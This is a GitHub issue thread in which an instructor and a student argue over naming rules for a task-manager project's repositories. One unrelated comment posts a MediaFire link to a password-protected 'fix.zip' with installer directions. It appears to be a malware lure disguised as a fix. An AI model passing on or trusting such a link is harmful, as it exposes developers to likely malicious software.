### ISSUE TITLE
Repo Name

### ISSUE THREAD

**Issue by zeemohamed7** [AliHussain-arch/TASK-MANAGER-GROUP-PROJECT#10]
As per the project requirements:

The GitHub repositories used for the project must be named appropriately. For example, names like book-binder-back-end or wellness-tracker-front-end are appropriate, whereas ga-project or mern-stack-project are not. The repos must be publicly accessible. Be sure to create the repos on your personal GitHub account and ensure they are public. (PROJECT should not be in name)

**Comment by seeronline** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by AliHussain-arch** [comment]
I asked Denis about it he said it would be fine,
I have three repositories
- TASK-MANAGER-GROUP-PROJECT (Main one where all the commits were made)
- TASK-MANAGER-GROUP-PROJECT-BACKEND (The one used to deploy the BACKEND)
- TASK-MANAGER-GROUP-PROJECT-FRONTEND (The one used to deploy the FRONTEND)
I think changing the name may break the deployment for the FRONTEND or BACKEND

**Comment by AliHussain-arch** [comment]
Changed the main project repository name
The GitHub repository used for the project must be named appropriately. For 
example, names like book-binder-back-end or wellness-tracker-front-end are 
appropriate, whereas ga-project or mern-stack-project are not. The repo must be 
publicly accessible. Be sure to create the repos on your personal GitHub account 
and ensure it is public.
This is what was written in the requirements it can take multiple definitions

**Comment by AliHussain-arch** [comment]
It does not mention anything about not adding a project to your repository name

**Comment by zeemohamed7** [comment]
As mentioned and clarified in class with Denis and I, your repo should be named appropriately according to the requirements without the mention of "group-project" especially for those looking at your work!
